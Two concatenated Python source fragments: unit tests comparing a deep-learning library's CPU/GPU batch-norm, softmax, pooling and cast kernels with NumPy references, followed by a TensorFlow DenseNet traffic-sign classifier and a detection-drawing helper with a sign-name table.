            np.testing.assert_array_almost_equal(bias.shape, (1, channel, 1, 1))
            np.testing.assert_array_almost_equal(rm.shape, (1, channel, 1, 1))
            np.testing.assert_array_almost_equal(rv.shape, (1, channel, 1, 1))
            batch_m = x.mean(axis=(0, 2, 3), keepdims=True)
            batch_v = x.var(axis=(0, 2, 3), keepdims=True)
            x_norm = (x - batch_m) / np.sqrt(batch_v + e)
            y_norm = x_norm * scale + bias
            # https://arxiv.org/pdf/1502.03167.pdf
            s = list(x.shape)
            s[1] = 1
            # unbiased (n/(n-1)) variance feeds the running statistics
            batch_v_unbiased = np.prod(s) * batch_v / (np.prod(s) - 1)
            rm = momentum * batch_m + (1 - momentum) * rm
            rv = momentum * batch_v_unbiased + (1 - momentum) * rv
            # https://docs.nvidia.com/deeplearning/sdk/cudnn-developer-guide/index.html#cudnnBatchNormalizationForwardTraining
            # this value is useful for bwd computation
            resultSaveInvVariance = 1 / np.sqrt(batch_v)
            return y_norm, rm, rv, batch_m, resultSaveInvVariance
        def _run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.1):
            # np api
            (y_1, rm_1, rv_1, bm_1, bv_1) = _np_bn_training(x_0,
                                                            s_0,
                                                            b_0,
                                                            rm_0,
                                                            rv_0,
                                                            momentum=m_0)
            # singa api
            hndl = singa_api.BatchNormHandle(
                m_0,
                tensor.Tensor(device=dev, data=x_0).data)
            (y_2_c, bm_2_c, bv_2_c) = singa_api.CpuBatchNormForwardTraining(
                hndl,
                tensor.Tensor(device=dev, data=x_0).data,
                tensor.Tensor(device=dev, data=s_0).data,
                tensor.Tensor(device=dev, data=b_0).data,
                tensor.Tensor(device=dev, data=rm_0).data,
                tensor.Tensor(device=dev, data=rv_0).data)
            np.testing.assert_array_almost_equal(
                y_1, tensor.to_numpy(_cTensor_to_pyTensor(y_2_c)), decimal=5)
            np.testing.assert_array_almost_equal(
                bm_1, tensor.to_numpy(_cTensor_to_pyTensor(bm_2_c)), decimal=5)
            # NOTE(review): the batch-variance comparison is deliberately
            # disabled -- presumably the kernel and the reference disagree on
            # biased vs. unbiased variance; confirm before re-enabling.
            #print(bv_1)
            #print(tensor.to_numpy(_cTensor_to_pyTensor(bv_2_c)))
            #np.testing.assert_array_almost_equal(
            #    bv_1, tensor.to_numpy(_cTensor_to_pyTensor(bv_2_c)), decimal=3)
            return
        # Small hand-written case, exercised at several momentum values.
        x_0 = np.array([1, 1, 1, 1, 2, 2, 2, 2, 10, 10, 10, 10, 20, 20, 20, 20],
                       dtype=np.float32).reshape((2, 2, 2, 2))
        s_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        b_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        rm_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        rv_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        _run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=1.0)
        _run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.0)
        _run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.2)
        # Larger randomised case.
        c = 10
        x_0 = np.random.random((10, c, 20, 20)).astype(np.float32)
        s_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        b_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        rm_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        rv_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        _run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.2)
    def test_batchnorm_testing_dnnl(self):
        # Checks the DNNL CPU batch-norm inference kernel against the closed
        # form scale*(x-rm)/sqrt(rv+e) + bias using the running statistics.
        dev = cpu_dev
        def _np_bn_testing(x, scale, bias, rm, rv, momentum=0.1, e=1e-5):
            # NumPy reference: per-channel params must be shaped (1, C, 1, 1).
            channel = x.shape[1]
            np.testing.assert_array_almost_equal(scale.shape,
                                                 (1, channel, 1, 1))
            np.testing.assert_array_almost_equal(bias.shape, (1, channel, 1, 1))
            np.testing.assert_array_almost_equal(rm.shape, (1, channel, 1, 1))
            np.testing.assert_array_almost_equal(rv.shape, (1, channel, 1, 1))
            return scale * (x - rm) / np.sqrt(rv + e) + bias
        def _run_testing(x_0, s_0, b_0, rm_0, rv_0, m_0=0.1):
            # np api
            y_1 = _np_bn_testing(x_0, s_0, b_0, rm_0, rv_0, momentum=m_0)
            # singa api
            hndl = singa_api.BatchNormHandle(
                m_0,
                tensor.Tensor(device=dev, data=x_0).data)
            y_2_c = singa_api.CpuBatchNormForwardInference(
                hndl,
                tensor.Tensor(device=dev, data=x_0).data,
                tensor.Tensor(device=dev, data=s_0).data,
                tensor.Tensor(device=dev, data=b_0).data,
                tensor.Tensor(device=dev, data=rm_0).data,
                tensor.Tensor(device=dev, data=rv_0).data)
            #print(y_1)
            #print(tensor.to_numpy(_cTensor_to_pyTensor(y_2_c)))
            np.testing.assert_array_almost_equal(
                y_1, tensor.to_numpy(_cTensor_to_pyTensor(y_2_c)), decimal=5)
            return
        # Small hand-written case followed by a larger randomised case.
        x_0 = np.array([1, 1, 1, 1, 2, 2, 2, 2, 10, 10, 10, 10, 20, 20, 20, 20],
                       dtype=np.float32).reshape((2, 2, 2, 2))
        s_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        b_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        rm_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        rv_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
        _run_testing(x_0, s_0, b_0, rm_0, rv_0, m_0=1.0)
        c = 10
        x_0 = np.random.random((10, c, 20, 20)).astype(np.float32)
        s_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        b_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        rm_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        rv_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
        _run_testing(x_0, s_0, b_0, rm_0, rv_0, m_0=1.0)
    def test_batchnorm_backward_dnnl(self):
        # Checks CpuBatchNormBackwardx (dL/dx only) against precomputed truth
        # values for a fixed 1x3x2x2 input with unit scale and zero bias.
        dev = cpu_dev
        N = 1
        C = 3
        H = 2
        W = 2
        data_shape = [N, C, H, W]
        param_shape = [1, C, 1, 1]
        data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
        # y_0 / dy_0 reuse the same values as x_0 on purpose: only dx is checked.
        x_0 = np.array(data, dtype=np.float32).reshape(data_shape)
        y_0 = np.array(data, dtype=np.float32).reshape(data_shape)
        dy_0 = np.array(data, dtype=np.float32).reshape(data_shape)
        scale_0 = np.array([1] * C, dtype=np.float32).reshape(param_shape)
        bias_0 = np.array([0] * C, dtype=np.float32).reshape(param_shape)
        mean_0 = x_0.mean(axis=(0, 2, 3), keepdims=True)
        var_0 = x_0.var(axis=(0, 2, 3), keepdims=True)
        hndl = singa_api.BatchNormHandle(
            0.1,
            tensor.Tensor(device=dev, data=x_0).data)
        # Only dx is compared; the dscale/dbias outputs are discarded.
        (dx_2_c, _, _) = singa_api.CpuBatchNormBackwardx(
            hndl,
            tensor.Tensor(device=dev, data=y_0).data,
            tensor.Tensor(device=dev, data=dy_0).data,
            tensor.Tensor(device=dev, data=x_0).data,
            tensor.Tensor(device=dev, data=scale_0).data,
            tensor.Tensor(device=dev, data=bias_0).data,
            tensor.Tensor(device=dev, data=mean_0).data,
            tensor.Tensor(device=dev, data=var_0).data,
        )
        # Reference gradient (identical per channel by symmetry of the input).
        dx_truth = np.array([[[[-1.0769e-05, -3.5985e-06],
                               [3.5985e-06, 1.0769e-05]],
                              [[-1.0769e-05, -3.5985e-06],
                               [3.5985e-06, 1.0769e-05]],
                              [[-1.0769e-05, -3.5985e-06],
                               [3.5985e-06, 1.0769e-05]]]])
        np.testing.assert_array_almost_equal(
            tensor.to_numpy(_cTensor_to_pyTensor(dx_2_c)), dx_truth)
        return
    def test_softmax_api_dnnl_backend(self):
        # Checks singa_api.SoftMax over every axis of 2-D/3-D/4-D inputs
        # against a flattened 2-D NumPy softmax reference.
        dev = cpu_dev
        def _run_test(org_shape, axis, aft_shape):
            # Large offset makes the max-subtraction below numerically necessary.
            x_0 = np.random.random(org_shape).astype(np.float32)
            x_0 = x_0 + 1000
            x0 = tensor.Tensor(device=dev, data=x_0)
            # test with axis
            y0 = tensor._call_singa_func(singa_api.SoftMax, x0.data, axis)
            # test with numpy
            x_0 = x_0.reshape(aft_shape)
            # subtracting a single global constant leaves softmax unchanged
            x_0 = x_0 - np.max(x_0)
            y1 = np.divide(np.exp(x_0),
                           np.sum(np.exp(x_0), axis=1).reshape(x_0.shape[0],
                                                               1))  # 2d softmax
            y1 = y1.reshape(org_shape)
            np.testing.assert_array_almost_equal(tensor.to_numpy(y0), y1)
        # (original shape, softmax axis, equivalent 2-D shape) triples;
        # negative axes exercise the wrap-around indexing.
        _run_test([2, 2], 1, [2, 2])
        _run_test([2, 2], 0, [1, 4])
        _run_test([2, 2], -1, [2, 2])
        _run_test([2, 2], -2, [1, 4])
        _run_test([2, 2, 2], 2, [4, 2])
        _run_test([2, 2, 2], 1, [2, 4])
        _run_test([2, 2, 2], 0, [1, 8])
        _run_test([2, 2, 2], -1, [4, 2])
        _run_test([2, 2, 2], -2, [2, 4])
        _run_test([2, 2, 2], -3, [1, 8])
        _run_test([2, 2, 2, 2], 3, [8, 2])
        _run_test([2, 2, 2, 2], 2, [4, 4])
        _run_test([2, 2, 2, 2], 1, [2, 8])
        _run_test([2, 2, 2, 2], 0, [1, 16])
        _run_test([2, 2, 2, 2], -1, [8, 2])
        _run_test([2, 2, 2, 2], -2, [4, 4])
        _run_test([2, 2, 2, 2], -3, [2, 8])
        _run_test([2, 2, 2, 2], -4, [1, 16])
def test_dnnl_pooling_max(self):
dev = cpu_dev
N = 1
C = 3
H = 2
W = 2
data_shape = [N, C, H, W]
param_shape = [1, C, 1, 1]
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
x0 = np.array(data, dtype=np.float32).reshape(data_shape)
x0_ct = tensor.Tensor(device=dev, data=x0).data
dy0 = np.array([1, 2, 3], dtype=np.float32).reshape([1, 3, 1, 1])
dy0_ct = tensor.Tensor(device=dev, data=dy0).data
hndl = singa_api.PoolingHandle(x0_ct, [2, 2], [1, 1], [0, 0], True)
y0_ct = singa_api.CpuPoolingForward(hndl, x0_ct)
y1 = np.array([[[[4.]], [[8.]], [[12.]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(y0_ct)), y1)
dx0_ct = singa_api.CpuPoolingBackward(hndl, dy0_ct, x0_ct, y0_ct)
dx1 = np.array([[[[0., 0.], [0., 1.]], [[0., 0.], [0., 2.]],
[[0., 0.], [0., 3.]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(dx0_ct)), dx1)
def test_dnnl_pooling_avg(self):
dev = cpu_dev
N = 1
C = 3
H = 2
W = 2
data_shape = [N, C, H, W]
param_shape = [1, C, 1, 1]
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
x0 = np.array(data, dtype=np.float32).reshape(data_shape)
x0_ct = tensor.Tensor(device=dev, data=x0).data
dy0 = np.array([1, 2, 3], dtype=np.float32).reshape([1, 3, 1, 1])
dy0_ct = tensor.Tensor(device=dev, data=dy0).data
hndl = singa_api.PoolingHandle(x0_ct, [2, 2], [1, 1], [0, 0], False)
y0_ct = singa_api.CpuPoolingForward(hndl, x0_ct)
y1 = np.array([[[[2.5000]], [[6.5000]], [[10.5000]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(y0_ct)), y1)
dx0_ct = singa_api.CpuPoolingBackward(hndl, dy0_ct, x0_ct, y0_ct)
dx1 = np.array([[[[0.2500, 0.2500], [0.2500, 0.2500]],
[[0.5000, 0.5000], [0.5000, 0.5000]],
[[0.7500, 0.7500], [0.7500, 0.7500]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(dx0_ct)), dx1)
def _concat_helper(self, dev):
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np2 = np.random.random([5, 6, 7, 1]).astype(np.float32)
np3 = np.concatenate((np1, np2), axis=3)
t1 = tensor.Tensor(device=dev, data=np1)
t2 = tensor.Tensor(device=dev, data=np2)
ctensors = singa_api.VecTensor()
ctensors.append(t1.data)
ctensors.append(t2.data)
t3_ct = singa_api.ConcatOn(ctensors, 3)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t3_ct)), np3)
    def test_concat_cpu(self):
        # Concat check on the host device.
        self._concat_helper(cpu_dev)
    @unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
    def test_concat_gpu(self):
        # Same check on the CUDA device (skipped on CPU-only builds).
        self._concat_helper(gpu_dev)
def _ceil_helper(self, dev):
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np1 * 10
np2 = np.ceil(np1)
t1 = tensor.Tensor(device=dev, data=np1)
t2_ct = singa_api.Ceil(t1.data)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t2_ct)), np2)
    def test_ceil_cpu(self):
        # Elementwise ceil check on the host device.
        self._ceil_helper(cpu_dev)
    @unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
    def test_ceil_gpu(self):
        # Same check on the CUDA device (skipped on CPU-only builds).
        self._ceil_helper(gpu_dev)
def _floor_helper(self, dev):
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np1 * 10
np2 = np.floor(np1)
t1 = tensor.Tensor(device=dev, data=np1)
t2_ct = singa_api.Floor(t1.data)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t2_ct)), np2)
    def test_floor_cpu(self):
        # Elementwise floor check on the host device.
        self._floor_helper(cpu_dev)
    @unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
    def test_floor_gpu(self):
        # Same check on the CUDA device (skipped on CPU-only builds).
        self._floor_helper(gpu_dev)
def _as_type_helper(self, dev):
np1 = np.random.random([3]).astype(np.float32)
np1 = np1 * 10 - 5
np2 = np1.astype(np.int32)
np3 = np2.astype(np.float32)
t1 = tensor.Tensor(device=dev, data=np1)
t1 = tensor.Tensor(device=dev, data=np1)
t1_ct = t1.data
self.assertEqual(t1_ct.data_type(), singa_api.kFloat32)
t1_ct = t1_ct.AsType(singa_api.kInt)
self.assertEqual(t1_ct.data_type(), singa_api.kInt)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t1_ct)), np2)
t1_ct = t1_ct.AsType(singa_api.kFloat32)
self.assertEqual(t1_ct.data_type(), singa_api.kFloat32)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t1_ct)), np3)
    def test_as_type_cpu(self):
        # Cast round-trip check on the host device.
        self._as_type_helper(cpu_dev)
    @unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
    def test_as_type_gpu(self):
        # Same check on the CUDA device (skipped on CPU-only builds).
        self._as_type_helper(gpu_dev)
def _as_type2_helper(self, dev):
shape1 = [1, 2, 3, 4]
shape2 = [4, 3, 2, 1]
np_int = np.random.randint(0, 10, shape1).astype(np.int32)
np_flt = np_int.astype(np.float32)
t1 = singa_api.Tensor(shape1, dev, singa_api.kInt)
t1.CopyIntDataFromHostPtr(np_int.flatten())
_ctensor_eq_ndarray(t1, np_int)
t1 = singa_api.Reshape(t1, shape2)
t2 = t1.AsType(singa_api.kFloat32)
_ctensor_eq_ndarray(t2, np_flt.reshape(shape2))
t3 = t2.AsType(singa_api.kInt)
_ctensor_eq_ndarray(t3, np_int.reshape(shape2))
t1 = singa_api.Reshape(t1, shape1)
t4 = t1.AsType(singa_api.kFloat32)
_ctensor_eq_ndarray(t4, np_flt.reshape(shape1))
    def test_as_type2_cpu(self):
        # Cast/reshape interleaving check on the host device.
        self._as_type2_helper(cpu_dev)
    @unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
    def test_as_type2_gpu(self):
        # Same check on the CUDA device (skipped on CPU-only builds).
        self._as_type2_helper(gpu_dev)
@unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not | |
# Source: wang-h-w/traffic-sign-detection -- EnvDetection/TSD_env_test.py
"""
Modified by: <NAME>, <NAME> and <NAME>
"""
import numpy as np
import cv2
import os
from core.model import P_Net, R_Net, O_Net
from core.detector import Detector
from core.fcn_detector import FcnDetector
from core.MtcnnDetector import MtcnnDetector
from datetime import timedelta
import tensorflow as tf
TF_VERSION = float('.'.join(tf.__version__.split('.')[:2]))
class DenseNet:
    """DenseNet image classifier (Huang et al., arXiv:1608.06993), specialised
    here for 48x48x3 traffic-sign crops with 46 output classes.

    The TF1 graph is built eagerly in ``__init__`` and the instance owns its
    own ``tf.Session``; call ``load_model()`` and then ``test(batch)`` for
    inference.
    """
    def __init__(self, growth_rate, depth,
                 total_blocks, keep_prob,
                 model_type, dataset='GTSRB',
                 reduction=1.0,
                 bc_mode=False,
                 ):
        # Input geometry and class count are hard-wired for this pipeline.
        self.data_shape = (48,48,3)
        self.n_classes = 46
        self.depth = depth
        self.growth_rate = growth_rate
        # how many features will be received after first convolution
        # value the same as in the original Torch code
        self.first_output_features = growth_rate * 2
        self.total_blocks = total_blocks
        # Composite layers per dense block, derived from the total depth.
        self.layers_per_block = (depth - (total_blocks + 1)) // total_blocks
        self.bc_mode = bc_mode
        # compression rate at the transition layers
        self.reduction = reduction
        if not bc_mode:
            print("Build %s model with %d blocks, "
                  "%d composite layers each." % (
                model_type, self.total_blocks, self.layers_per_block))
        if bc_mode:
            # DenseNet-BC: each composite layer is preceded by a 1x1
            # bottleneck, so half the counted layers remain composite.
            self.layers_per_block = self.layers_per_block // 2
            print("Build %s model with %d blocks, "
                  "%d bottleneck layers and %d composite layers each." % (
                model_type, self.total_blocks, self.layers_per_block,
                self.layers_per_block))
        print("Reduction at transition layers: %.1f" % self.reduction)
        self.keep_prob = keep_prob
        self.model_type = model_type
        self.dataset_name = dataset
        self.batches_step = 0
        # Build inputs, graph and session up front.
        self._define_inputs()
        self._build_graph()
        self._initialize_session()
    def _initialize_session(self):
        """Initialize session, variables, saver"""
        config = tf.ConfigProto()
        # restrict model GPU memory utilization to min required
        config.gpu_options.allow_growth = True
        self.sess = tf.Session(config=config)
        # NOTE(review): tf_ver is computed but unused -- the module-level
        # TF_VERSION constant drives the branch below.
        tf_ver = int(tf.__version__.split('.')[1])
        if TF_VERSION <= 0.10:
            self.sess.run(tf.initialize_all_variables())
        else:
            self.sess.run(tf.global_variables_initializer())
        self.saver = tf.train.Saver()
    @property
    def save_path(self):
        # Lazily created checkpoint path, cached on first access.
        try:
            save_path = self._save_path
        except AttributeError:
            save_path = 'saves/%s' % self.model_identifier
            os.makedirs(save_path, exist_ok=True)
            save_path = os.path.join(save_path, 'model.chkpt')
            self._save_path = save_path
        return save_path
    @property
    def model_identifier(self):
        # Unique name combining architecture hyper-parameters and dataset.
        return "{}_growth_rate={}_depth={}_dataset_{}".format(
            self.model_type, self.growth_rate, self.depth, self.dataset_name)
    def save_model(self, global_step=None):
        """Write a checkpoint of the current session to ``save_path``."""
        self.saver.save(self.sess, self.save_path, global_step=global_step)
    def load_model(self):
        """Restore weights from ``save_path``; raise IOError on failure."""
        try:
            self.saver.restore(self.sess, self.save_path)
        except Exception as e:
            raise IOError("Failed to to load model "
                          "from save path: %s" % self.save_path)
        #self.saver.restore(self.sess, self.save_path)
        print("Successfully load model from save path: %s" % self.save_path)
    def log_loss_accuracy(self, loss, accuracy, epoch, prefix,
                          should_print=True):
        """Log loss/accuracy scalars to TensorBoard (and optionally stdout).

        NOTE(review): relies on ``self.summary_writer`` which is not created
        anywhere in this file -- confirm it is attached by training code.
        """
        if should_print:
            print("mean cross_entropy: %f, mean accuracy: %f" % (
                loss, accuracy))
        summary = tf.Summary(value=[
            tf.Summary.Value(
                tag='loss_%s' % prefix, simple_value=float(loss)),
            tf.Summary.Value(
                tag='accuracy_%s' % prefix, simple_value=float(accuracy))
        ])
        self.summary_writer.add_summary(summary, epoch)
    def _define_inputs(self):
        """Create the input/label/learning-rate/is_training placeholders."""
        shape = [None]
        shape.extend(self.data_shape)
        self.images = tf.placeholder(
            tf.float32,
            shape=shape,
            name='input_images')
        self.labels = tf.placeholder(
            tf.float32,
            shape=[None, self.n_classes],
            name='labels')
        self.learning_rate = tf.placeholder(
            tf.float32,
            shape=[],
            name='learning_rate')
        # Toggles batch-norm statistics and dropout behaviour.
        self.is_training = tf.placeholder(tf.bool, shape=[])
    def composite_function(self, _input, out_features, kernel_size=3):
        """Function from paper H_l that performs:
        - batch normalization
        - ReLU nonlinearity
        - convolution with required kernel
        - dropout, if required
        """
        with tf.variable_scope("composite_function"):
            # BN
            output = self.batch_norm(_input)
            # ReLU
            output = tf.nn.relu(output)
            # convolution
            output = self.conv2d(
                output, out_features=out_features, kernel_size=kernel_size)
            # dropout(in case of training and in case it is no 1.0)
            output = self.dropout(output)
        return output
    def bottleneck(self, _input, out_features):
        """BN -> ReLU -> 1x1 conv producing 4*out_features channels (BC mode)."""
        with tf.variable_scope("bottleneck"):
            output = self.batch_norm(_input)
            output = tf.nn.relu(output)
            inter_features = out_features * 4
            output = self.conv2d(
                output, out_features=inter_features, kernel_size=1,
                padding='VALID')
            output = self.dropout(output)
        return output
    def add_internal_layer(self, _input, growth_rate):
        """Perform H_l composite function for the layer and after concatenate
        input with output from composite function.
        """
        # call composite function with 3x3 kernel
        if not self.bc_mode:
            comp_out = self.composite_function(
                _input, out_features=growth_rate, kernel_size=3)
        elif self.bc_mode:
            bottleneck_out = self.bottleneck(_input, out_features=growth_rate)
            comp_out = self.composite_function(
                bottleneck_out, out_features=growth_rate, kernel_size=3)
        # concatenate _input with out from composite function
        if TF_VERSION >= 1.0:
            output = tf.concat(axis=3, values=(_input, comp_out))
        else:
            output = tf.concat(3, (_input, comp_out))
        return output
    def add_block(self, _input, growth_rate, layers_per_block):
        """Add N H_l internal layers"""
        output = _input
        for layer in range(layers_per_block):
            with tf.variable_scope("layer_%d" % layer):
                output = self.add_internal_layer(output, growth_rate)
        return output
    def transition_layer(self, _input):
        """Call H_l composite function with 1x1 kernel and after average
        pooling
        """
        # call composite function with 1x1 kernel
        out_features = int(int(_input.get_shape()[-1]) * self.reduction)
        output = self.composite_function(
            _input, out_features=out_features, kernel_size=1)
        # run average pooling
        output = self.avg_pool(output, k=2)
        return output
    def trainsition_layer_to_classes(self, _input):
        """This is last transition to get probabilities by classes. It perform:
        - batch normalization
        - ReLU nonlinearity
        - wide average pooling
        - FC layer multiplication

        NOTE(review): method name keeps the original 'trainsition' typo for
        checkpoint/caller compatibility.
        """
        # BN
        output = self.batch_norm(_input)
        # ReLU
        output = tf.nn.relu(output)
        # average pooling
        last_pool_kernel = int(output.get_shape()[-2])
        output = self.avg_pool(output, k=last_pool_kernel)
        # FC
        features_total = int(output.get_shape()[-1])
        output = tf.reshape(output, [-1, features_total])
        W = self.weight_variable_xavier(
            [features_total, self.n_classes], name='W')
        bias = self.bias_variable([self.n_classes])
        logits = tf.matmul(output, W) + bias
        return logits
    def conv2d(self, _input, out_features, kernel_size,
               strides=[1, 1, 1, 1], padding='SAME'):
        """2-D convolution with an MSRA-initialised kernel variable."""
        in_features = int(_input.get_shape()[-1])
        kernel = self.weight_variable_msra(
            [kernel_size, kernel_size, in_features, out_features],
            name='kernel')
        output = tf.nn.conv2d(_input, kernel, strides, padding)
        return output
    def avg_pool(self, _input, k):
        """Average pooling with a k x k window and stride k (no padding)."""
        ksize = [1, k, k, 1]
        strides = [1, k, k, 1]
        padding = 'VALID'
        output = tf.nn.avg_pool(_input, ksize, strides, padding)
        return output
    def batch_norm(self, _input):
        """Batch normalisation driven by the is_training placeholder."""
        output = tf.contrib.layers.batch_norm(
            _input, scale=True, is_training=self.is_training,
            updates_collections=None)
        return output
    def dropout(self, _input):
        """Apply dropout only during training and only if keep_prob < 1."""
        if self.keep_prob < 1:
            output = tf.cond(
                self.is_training,
                lambda: tf.nn.dropout(_input, self.keep_prob),
                lambda: _input
            )
        else:
            output = _input
        return output
    def weight_variable_msra(self, shape, name):
        # He/MSRA initialisation, suited to ReLU activations.
        return tf.get_variable(
            name=name,
            shape=shape,
            initializer=tf.contrib.layers.variance_scaling_initializer())
    def weight_variable_xavier(self, shape, name):
        # Xavier/Glorot initialisation, used for the final FC layer.
        return tf.get_variable(
            name,
            shape=shape,
            initializer=tf.contrib.layers.xavier_initializer())
    def bias_variable(self, shape, name='bias'):
        # Zero-initialised bias variable.
        initial = tf.constant(0.0, shape=shape)
        return tf.get_variable(name, initializer=initial)
    def _build_graph(self):
        """Assemble the full inference graph: initial conv, dense blocks with
        transitions, and the final transition to class predictions."""
        growth_rate = self.growth_rate
        layers_per_block = self.layers_per_block
        # first - initial 3 x 3 conv to first_output_features
        with tf.variable_scope("Initial_convolution"):
            output = self.conv2d(
                self.images,
                out_features=self.first_output_features,
                kernel_size=3)
        # add N required blocks
        for block in range(self.total_blocks):
            with tf.variable_scope("Block_%d" % block):
                output = self.add_block(output, growth_rate, layers_per_block)
            # last block exist without transition layer
            if block != self.total_blocks - 1:
                with tf.variable_scope("Transition_after_block_%d" % block):
                    output = self.transition_layer(output)
        with tf.variable_scope("Transition_to_classes"):
            logits = self.trainsition_layer_to_classes(output)
        prediction = tf.nn.softmax(logits)
        #print(prediction.shape)
        # Inference-only head: argmax over class probabilities.
        self.prediction_out = tf.argmax(prediction, 1)
    def test(self, data):
        """Run inference on a batch of images; returns predicted class ids."""
        #print(data.shape)
        feed_dict = {
            self.images: data,
            self.is_training: False,
        }
        #fetches = [self.cross_entropy, self.accuracy]
        out = self.sess.run(self.prediction_out, feed_dict=feed_dict)
        #print(out.shape,out)
        return out
        #return mean_loss, mean_accuracy
def _measure_mean_and_std(images):
# for every channel in image
means = []
stds = []
# for every channel in image (assume this is last dimension)
for ch in range(images.shape[-1]):
means.append(np.mean(images[:, :, :, ch]))
stds.append(np.std(images[:, :, :, ch]))
return means,stds
def normalize_images(images):
    """Standardise each channel of a 4-D image batch to zero mean and unit
    variance; returns a new float64 array (the input is not modified).

    NOTE: a constant channel (std == 0) would divide by zero, as in the
    original implementation.
    """
    images = images.astype('float64')
    means, stds = _measure_mean_and_std(images)
    for ch in range(images.shape[-1]):
        images[:, :, :, ch] = (images[:, :, :, ch] - means[ch]) / stds[ch]
    return images
def visssss(img, dets2, pred, collect, images_ori, thresh=0.998):
    """Draw confident traffic-sign detections on an image.

    Parameters: ``img`` BGR image; ``dets2`` (N, 5) detections as
    [x1, y1, x2, y2, score]; ``pred`` class index per detection; ``collect``
    maps class index -> TT100K class code; ``images_ori`` per-detection crops.

    Returns (image annotated with numeric indices, image annotated with sign
    names, {index: sign name}, list of kept crops).

    Fix: corrected copy-paste errors in the label table -- 'il60'/'il80'
    both said 100km/h, 'ph5' said 4.5 meters, 'pm30' said 20t.
    """
    img_handle = img.copy()
    img_save = img.copy()
    idx = 1  # running label number drawn on the image
    categroy_dict = {}
    # TT100K class code -> human-readable sign name.
    class2name = {'i2': 'Non-motorized road', 'i4': 'Motor vehicle road', 'i5': 'Drive on the right side of the road',
                  'il100': 'minimum speed limit 100km/h', 'il60': 'minimum speed limit 60km/h',
                  'il80': 'minimum speed limit 80km/h',
                  'io': 'unknown', 'ip': 'crosswalk', 'p10': 'no motor vehicles', 'p11': 'no honking', 'p12': 'no motorbike',
                  'p19': 'no right turn', 'p23': 'no left turn', 'p26': 'no trucks', 'p27': 'no motor vehicles',
                  'p3': 'no large passenger cars', 'p5': 'no U-turn', 'p6': 'no non-motorized vehicles',
                  'pg': 'slow down and yield', 'ph4': 'maximum height 4 meters', 'ph4.5': 'maximum height 4.5 meters',
                  'ph5': 'maximum height 5 meters', 'pl100': 'speed limit 100km/h', 'pl120': 'speed limit 120km/h',
                  'pl20': 'speed limit 20km/h', 'pl30': 'speed limit 30km/h', 'pl40': 'speed limit 40km/h',
                  'pl5': 'speed limit 5km/h', 'pl50': 'speed limit 50km/h', 'pl60': 'speed limit 60km/h',
                  'pl70': 'speed limit 70km/h',
                  'pl80': 'speed limit 80km/h', 'pm20': 'weight limit 20t', 'pm30': 'weight limit 30t',
                  'pm55': 'weight limit 55t',
                  'pn': 'no Parking', 'pne': 'no entry', 'po': 'unknown', 'pr40': 'lift speed limit', 'w13': 'crossroads',
                  'w32': 'under construction', 'w55': 'watch out for children', 'w57': 'watch out for pedestrians',
                  'w59': 'pay attention to confluence', 'wo': 'unknown'}
    select_res = []
    for i in range(dets2.shape[0]):
        bbox = dets2[i, :4].astype('int32')
        score = dets2[i, 4]
        # Keep only confident detections; pred[i] == 45 appears to denote the
        # background/unknown class -- TODO confirm against the classifier.
        if score > thresh and pred[i] < 45:
            clas = pred[i]
            signname = class2name[collect[clas]]
            categroy_dict[idx] = signname
            select_res.append(images_ori[i])
            # One output copy carries the numeric index, the other the label text.
            cv2.rectangle(img_handle, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (0, 255, 0), 2)
            cv2.putText(img_handle, str(idx), (bbox[0]-3, bbox[1]-5), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,255,0), 2)
            cv2.rectangle(img_save, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (0, 255, 0), 2)
